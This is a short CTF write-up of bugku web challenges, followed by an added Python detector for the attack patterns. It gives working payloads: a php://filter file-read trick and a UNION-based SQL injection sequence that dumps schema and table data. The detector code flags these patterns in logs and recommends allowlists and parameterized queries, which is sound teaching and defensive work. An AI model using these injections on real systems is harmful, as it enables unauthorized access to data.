bugku web writeup
1. flag in index
Enter ?file=php://filter/read=convert.base64-encode/resource=index.php to get base64 output; decode it to get the flag.
2. Enter the password to view the flag
3. Click ten thousand times
Capture the request with Burp Suite, submit clicks=1000000, and get the flag.
4. Score sheet
Dump the database name: id=-1' union select 1,2,3,database()#
Dump the tables: id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
Dump the columns: id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# (0x666c3467 is the hex encoding of fl4g)
Query the data: id=-1' union select 1,2,3,skctf_flag from fl4g# to get the flag.
![Insert image description here](https://img-blog.csdnimg.cn/2019111511015547.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2d1ZHVnZWpp,size_16,color_FFFFFF,t_70)
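Seen from the defending side, the php://filter request in challenge 1 and the union select steps in challenge 4 both leave recognizable parameter values in request logs. The following is an added example, not part of the original writeup: a small detector run over constructed request targets. The rule names and sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# PHP stream wrappers that have no business in a file/path parameter.
WRAPPER_RE = re.compile(r"^\s*(php|data|phar|zip|expect)://", re.I)
# UNION-based injection and schema enumeration, as in the steps above.
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\b", re.I)
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Constructed sample request targets (not captured traffic).
SAMPLES = [
    "/index.php?file=php://filter/read=convert.base64-encode/resource=index.php",
    "/?id=-1%27%20union%20select%201,2,3,database()%23",
    "/?id=-1%27%20union%20select%201,2,3,group_concat(table_name)%20from%20"
    "information_schema.tables%20where%20table_schema=database()%23",
    "/?id=3&file=show.php",
    "/?q=student+union+elections",
]


def normalize(value: str) -> str:
    """Decode a second URL-encoding layer and replace /* */ comments with a space."""
    return INLINE_COMMENT_RE.sub(" ", unquote_plus(value))


def classify(target: str) -> list[str]:
    """Return the sorted rule names (hypothetical labels) hit by a request target."""
    hits = set()
    # parse_qsl already decodes one layer of percent-encoding.
    for _name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalize(raw)
        if WRAPPER_RE.search(value):
            hits.add("php-stream-wrapper")
        if UNION_RE.search(value):
            hits.add("sqli-union-select")
        if SCHEMA_RE.search(value):
            hits.add("sqli-schema-enumeration")
    return sorted(hits)


if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["clean"], target)
```

Pattern matching like this is a logging and alerting aid; the fix on the server side is an allowlist of includable files and parameterized queries.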